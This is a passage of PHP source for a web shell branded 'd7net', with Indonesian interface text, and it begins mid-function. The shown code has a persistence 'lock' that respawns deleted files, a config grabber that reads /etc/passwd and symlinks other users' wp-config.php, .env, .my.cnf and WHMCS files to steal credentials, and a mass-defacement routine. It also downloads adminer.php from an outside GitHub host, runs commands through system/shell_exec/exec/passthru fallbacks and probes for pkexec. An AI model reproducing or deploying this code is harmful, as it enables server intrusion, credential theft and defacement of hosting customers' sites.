$filez.'-xd7net').d7net_ex($filez).'xhand.Lock', $serlok); } cmd("cp $filez ".$tempe."/".md5($serlok. $filez.'-xopet').d7net_ex($filez).'xd7net.Lock', $serlok); @chmod($filez, 0444); $content = '<?php $tmp = "/tmp"; $fileperm = d7net_perm("'.$filez.'"); d7net_cmd("chmod 444 '.$filez.'"); while (True) { if (!file_exists("'.$filez.'")) { $var = base64_encode(file_get_contents($tmp . "/'.md5($serlok. $filez.'-xopet').d7net_ex($filez).'xd7net.Lock")); FiLe_pUt_ConTentS("'.$filez.'", base64_decode($var)); } if ($fileperm != "0444"){ d7net_cmd("chmod 444 '.$filez.'"); } } function d7net_cmd($value) { if (function_exists("system")) { sYsTem($value); } else if (function_exists("shell_exec")) { return ShEll_eXeC($value); } else if (function_exists("exec")) { return ExEc($value); } else if (function_exists("passthru")) { return pAsSThRu($value); } } function d7net_perm($filez){ return substr(sprintf("%o", fileperms($filez)), -4); }'; $content = file_put_contents($tempe. "/" .md5($serlok. $filez.'-xd7net'). d7net_ex($filez).'xhand.Lock', $content); if ($content) { echo "<table class='directory-listing-table' style='border-color:lime;'><td>Locked => <font color='lime'>$filez</font></td></table>"; cmd('php '. $tempe . '/' .md5($serlok. $filez.'-xd7net').d7net_ex($filez).'"xhand.Lock" > /dev/null 2>/dev/null &', $serlok); } else { echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't lock $filez</font></td></table>"; } } }exit(); } elseif ($_GET[net('resetcp')] == "opet") { echo "<table class='directory-listing-table'><td> <h5>Coming Soon</h5><hr></td></table><br>";exit(); } elseif ($_GET[net('hashiden')] == "opet") { echo "<table class='directory-listing-table'><td> <h5>Hash Identifier</h5>Identify and detect unknown hashes using this tool.<hr> <form method='POST'> <div class='input-group' style='width:650px;'> <span class='input-group-text mb-2'>Your hash :</span> <input type='text' name='hash' class='form-control mb-2' placeholder='write here'></div><br> <button type='submit' name='submit' class='btn btn-outline-light'>Submit & identify</button> <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light'>Back</a></form></td></table><br>"; if (isset($_POST['submit'])) { if (empty($_POST['hash'])) { echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> The Hashes field is required</font></center></td></table>"; } else { function identify($hash) { $algorithms = [ '<font color="lime">MD5' => '/^[a-f0-9]{32}$/i', '<font color="lime">SHA1' => '/^[a-f0-9]{40}$/i', '<font color="lime">SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i', '<font color="lime">SHA256' => '/^[a-f0-9]{64}$/i', '<font color="lime">SHA512' => '/^[a-f0-9]{128}$/i', '<font color="lime">Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/', '<font color="lime">Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/', '<font color="lime">Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/']; foreach ($algorithms as $name => $pattern) { if (preg_match($pattern, $hash)) { return $name; } } return '<font color="red">Could not identify / Tidak dapat mengidentifikasi</font>'; } $hashes = [$_POST['hash']]; echo "<table class='directory-listing-table'><td>"; foreach ($hashes as $hash) { echo " Hash : <font color='lime'>$hash\n</font>"; echo "<br> Algorithms : " .identify($hash). "\n\n</font></td></table>"; } } } exit(); } elseif ($_GET[net('grab_config')] == "opet") { @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1); echo '<table class="directory-listing-table"><thead><td> <center>Config Grabber<br><br><form method="POST"><textarea cols="100" name="passwd" rows="25">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } echo'</textarea><br> <input type="hidden" class="input" name="folfig" value="d7netcfg"/><br> <select class="form-select form-select-sm" aria-label=".form-select-lg example" style="width:150px;"> <option>select menu</option> <option title="type txt" value=".txt">.txt</option> <option title="type php" value=".php">.php</option> <option title="type shtml" value=".shtml">.shtml</option> <option title="type ini" value=".ini">.ini</option> <option title="type html" value=".html">.html</option></select><br> <input name="conf" style="width:100px;" class="btn btn-outline-light" value="submit" type="submit"> </td></thead></table></form></center><br>'; } if(isset($_POST['conf'])) { $v = "var"; $folfig = $_POST['folfig']; $type = $_POST['type']; @mkdir($folfig, 0755); @chdir($folfig); $htaccess=" Options Indexes FollowSymLinks \nDirectoryIndex .my.cnf \nAddType txt .php \nAddType txt .my.cnf \nAddType txt .accesshash \nAddHandler txt .php \nAddHandler txt .cnf \nAddHandler txt .accesshash "; file_put_contents(".htaccess",$htaccess,FILE_APPEND); $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){ $user=trim($pwd); @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt'); @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt'); @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt'); @symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt'); @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wp1.txt'); @symlink('/home/'.$user.'/htdocs/wp-config.php',$user.'-Wp-htdocs.txt'); @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wp2.txt'); @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'-Wp3.txt'); @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-WpHm1.txt'); @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-WpHm2.txt'); @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-WpHm3.txt'); @symlink('/var/www/html/wp-config.php',$v.'-wp1.txt'); @symlink('/home/'.$user.'/public_html/.env',$user.'-Laravel1.txt'); @symlink('/home/'.$user.'/public_html/web/.env',$user.'-Laravel2.txt'); @symlink('/home/'.$user.'/public_html/public/.env',$user.'-Laravel3.txt'); @symlink('/var/www/html/.env',$v.'-LaravelV.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt'); @symlink('/home/'.$user.'/public_html/html/configuration.php',$user.'-Joomla2.txt'); @symlink('/home/'.$user.'/public_html/web/configuration.php',$user.'-Joomla3.txt'); @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt'); @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt'); @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt'); @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt'); @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt'); @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt'); @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt'); @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt'); @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt'); @symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-Magento.txt'); @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter.txt'); @symlink('/home/'.$user.'/public_html/web/application/config/database.php',$user.'-CodeIgniterH.txt'); @symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter1.txt'); @symlink('/home2/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter2.txt'); @symlink('/home3/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter3.txt'); @symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt'); @symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt'); @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt'); @symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangento.txt'); echo '<table class="directory-listing-table"><thead><td><center>Done => <a href='.$folfig.' target="_blank" class="button">Click Here</a></center></td></thead></table><br>'; }exit(); } elseif ($_REQUEST[net('scanshell')] == "opet") { echo "<center><table class='directory-listing-table'><td> <form method='post'> <h5><i class='fa-solid fa-newspaper'></i> Backdoors Scanning</font></h5><hr> *note : Jika resultnya kosong berarti tidak ditemukan/ekstensi nya di isi dengan benar <div class='input-group mb-2' style='width:350px;'> <span class='input-group-text mb-1'>Extension :</span> <input type='text' class='form-control' name='ext' placeholder='ex : php, phar, shtml, phtml'></div> <div class='input-group mb-2' style='width:550px;'> <span class='input-group-text mb-1'>Directory :</span> <input type='text' class='form-control' name='peth' value='$serlok'></div> <button type='submit' class='btn btn-outline-light' name='submit' style='width:120px;'>Submit</button> <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a> </form></td></table><br>"; if(isset($_POST['submit'])) { function scan_directory($dir) { $ext = $_POST['ext']; $rdi = new RecursiveDirectoryIterator($dir); echo "<table class='directory-listing-table'><td>"; foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) { if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) { $content = file_get_contents($filename); if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) { echo "<pre>Found : <font color='lime'>$filename</font> => <font color='orange'>Detected</font> <a href='?viewfile=$filename&path=".$_GET['path']."/$rdi' target='_blank'><i>view</i></a></pre>\n"; } } } } $cek = $_POST['peth']; if ($cek) { scan_directory($cek); echo "<font color='aqua'>Scan Completed..!!</font></td></table><br>"; } } exit(); } elseif ($_REQUEST[net('massdef')] == "opet") { function sabun_massal($serlok,$namafile,$isi_script) { if(is_writable($serlok)) { $dira = scandir($serlok); foreach($dira as $dirb) { $dirc = "$serlok/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $serlok<br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($serlok,$namafile,$isi_script) { if(is_writable($serlok)) { $dira = scandir($serlok); foreach($dira as $dirb) { $dirc = "$serlok/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo " http://$dirb/$namafile<br>"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "<table class='directory-listing-table'><td>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</td></table></div>"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "<table class='directory-listing-table'><td>"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</td></table></div>"; } } else { echo "<table class='directory-listing-table'><td>"; echo "<form method='post'> <div class='form-check-inline mb-2'> <input type='radio' name='tipe_sabun' id='biasa' class='form-check-input' value='murah' checked> <label class='form-check-label' for='inlineRadio1'>Biasa</label></div> <div class='form-check form-check-inline'> <input type='radio' name='tipe_sabun' class='form-check-input' value='mahal'> <label class='form-check-label' for='inlineRadio2'>Massal</label></div> <div class='input-group' style='width:430px;'> <span class='input-group-text mb-1'>Files :</span> <input type='text' name='d_file' class='form-control' placeholder='file.html'></div> <div class='input-group' style='width:750px;'> <span class='input-group-text mb-1'>Path :</span> <input type='text' name='d_dir' class='form-control' value='$serlok'></div> <textarea name='script' class='form-control' style='width: 750px; height: 300px;' placeholder='Hello Word!'></textarea><br> <button type='submit' name='start' value='start' class='btn btn-outline-light' style='width: 300px;'>submit</button> <a href='?path=$serlok&".net('tool')."=opet' class='btn btn-outline-light' style='width: 300px;'>Back</a> </form></td></table>"; }exit(); } elseif ($_REQUEST[net('ner')] == "opet") { function crot($url){ $d7net = curl_init($url); curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1); curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($d7net, CURLOPT_HEADER, 0); return curl_exec($d7net); curl_close($d7net); } echo "<table class='directory-listing-table'><td><h5><i class='fa fa-database' aria-hidden='true'></i> Adminer<font class='d7net-text' style='font-size:12px;'><i> v4.8.1</i></font></h5><hr><center> <form method='POST'> <div class='input-group' style='width:300px;'> <span class='input-group-text mb-2'>Filename :</span> <input type='text' placeholder='adminer.php' class='form-control mb-2' name='miner'></div><br> <button type='sumbit' class='btn btn-outline-light' name='gass' style='width:120px;'>Submit</button> <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form></td></table><br>"; if(isset($_POST['gass'])) { if (empty($_POST['miner'])) { echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Input field is required<center></font></td></table>"; } else { $check = $serlok."/".$_POST['miner']; $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web."",$check); $content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php'); $open = fopen($check, 'w'); fwrite($open, $content); fclose($open); if (file_exists($check)) { echo "<table class='directory-listing-table' style='border-color:lime;'><td>Adminer<font color='lime'> : $check </font><br>Link : <a href='".$result."' target='_blank'><i>$result</i></a></td></table>"; } else { echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create adminer..!!</center></font></td></table>"; } } }exit(); } elseif ($_REQUEST[net('buatfile')] == "opet") { function createfile(){ $pat = $_GET['path']; $nama_file = $_POST['nama_file']; $isi_file = $_POST['isi_file']; $handle = fopen("$pat/$nama_file", 'w'); $files = $_GET['path']."/".$nama_file; $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files); if (fwrite($handle, $isi_file)) { echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>'; } else { echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>'; } } if(!isset($_POST['bikin'])) { echo "<center><table class='directory-listing-table'><td width='12%''> <form method='POST'> <input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br> <textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br> <button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> <a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br> </form></center>"; } else { createfile(); }exit(); } elseif ($_GET[net('buatfolder')] == "opet") { function createDirectory() { if (empty($_POST['add'])) { echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>'; } else { $add = $_POST["add"]; $d7net = mkdir($_GET['path']."/".$add); if ($d7net == true) { echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br> <a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>"; } else { echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>"; } } } if (!isset($_POST['submit'])) { echo '<table class="directory-listing-table"><td> <form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center> <div style="width:300px;"> <input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div> <button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> <a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>'; } else { createDirectory(); }exit(); } elseif ($_REQUEST[net('info')] == "opet") { echo "<table class='directory-listing-table' align='center'> <div id='content'><tr><td>"; echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>"; echo "Server IP : <font color=orange>".ipserv()."</font> <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>"; echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>"; echo "System : <font color='orange'>".php_uname()."</font><br>"; echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>"; echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>"; echo "</tr></td><tr><td>Disable Function : ".$disf."</font>"; echo "</div></tr></td><tr><td>"; echo "<hr>Orecle : "; if (function_exists('oci_connect')) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; echo " | SSH2 : "; } if (function_exists('ssh2_connect')) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; echo " | MySQL : "; } if (function_exists("mysql_connect")) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo " | cURL : "; if (function_exists("curl_init")) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo " | WGET : "; if (file_exists("/usr/bin/wget")) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo " | Perl : "; if (file_exists("/usr/bin/perl")) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo " | Python : "; if (file_exists("/usr/bin/python2")) { echo "<font color=lime>ON</font>"; } else { echo "<font color=red>OFF</font>"; } $pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>"; echo " | PKEXEC : $pkexec<br><br>"; echo "</tr></td></table><br>"; exit(); } if (!is_readable($serlok)) { die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>"); } echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><tr> <th><center>Name</center></th> <th><center>Size</center></th> <th><center>Last Modified</center></th> <th><center>Owner</center></th> <th><center>Permissions</center></th> <th><center>Actions</center></th> </tr></thead><center>'; $scd = "\163\143"."\141\156\144"."\151\162"; if(is_readable($serlok)){ $fetch=$scd($serlok); $serlokbos=array(); $filez=array(); foreach($fetch as $fols){ if($fols=='.'||$fols=='..'){ continue; } $d7nets=$serlok.'/'.$fols; if(is_dir($d7nets)){ array_push($serlokbos,$fols); }elseif(is_file($d7nets)){ array_push($filez,$fols); } } } foreach($serlokbos as $dir){ echo "<tr> <td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td> <td><center>Dir</center></td> <td><center>".filedate($serlok."/".$dir)."</center></td> <td>".owner($serlok."/".$dir)."</td> <td><center>"; if(is_writable($serlok."/".$dir)) echo '<font color="lime">'; elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">'; echo statusnya($serlok."/".$dir); if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\"> <div class='btn-group me-2' role='group' aria-label='First group'> <button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil' style='color: #fff'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\"> </form></center></td> </tr>"; } foreach($filez as $file) { if(!is_file("$serlok/$file")) continue; $size = filesize("$serlok/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = '<font color="aqua">'.round($size/1024,2).'</font> MB'; } else { $size = '<font color="#E6F01C">'.$size.'</font> KB'; } echo "<tr> <td>".cekfile($serlok."/".$file)." <a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td> <td><center>".$size."</center></td> <td><center>".filedate($serlok."/".$file)."</center></td> <td>".owner($serlok."/".$file)."</td> <td><center>"; if(is_writable("$serlok/$file")) echo '<font color="lime">'; elseif(!is_readable("$serlok/$file")) echo '<font color="red">'; echo statusnya("$serlok/$file"); if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>'; echo "</center></td><td><center> <form method='post' action='?pilihan&path=$serlok'> <div class='btn-group' role='group' aria-label='First group'>"; echo gazz($file); echo "</div><input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$serlok/$file\"> </form></center></td></tr>"; } echo '</tr></td></table></table>'; author(); function statusnya($file){ $izin = substr(sprintf('%o', fileperms($file)), -4); return $izin; } ?> </body> </html>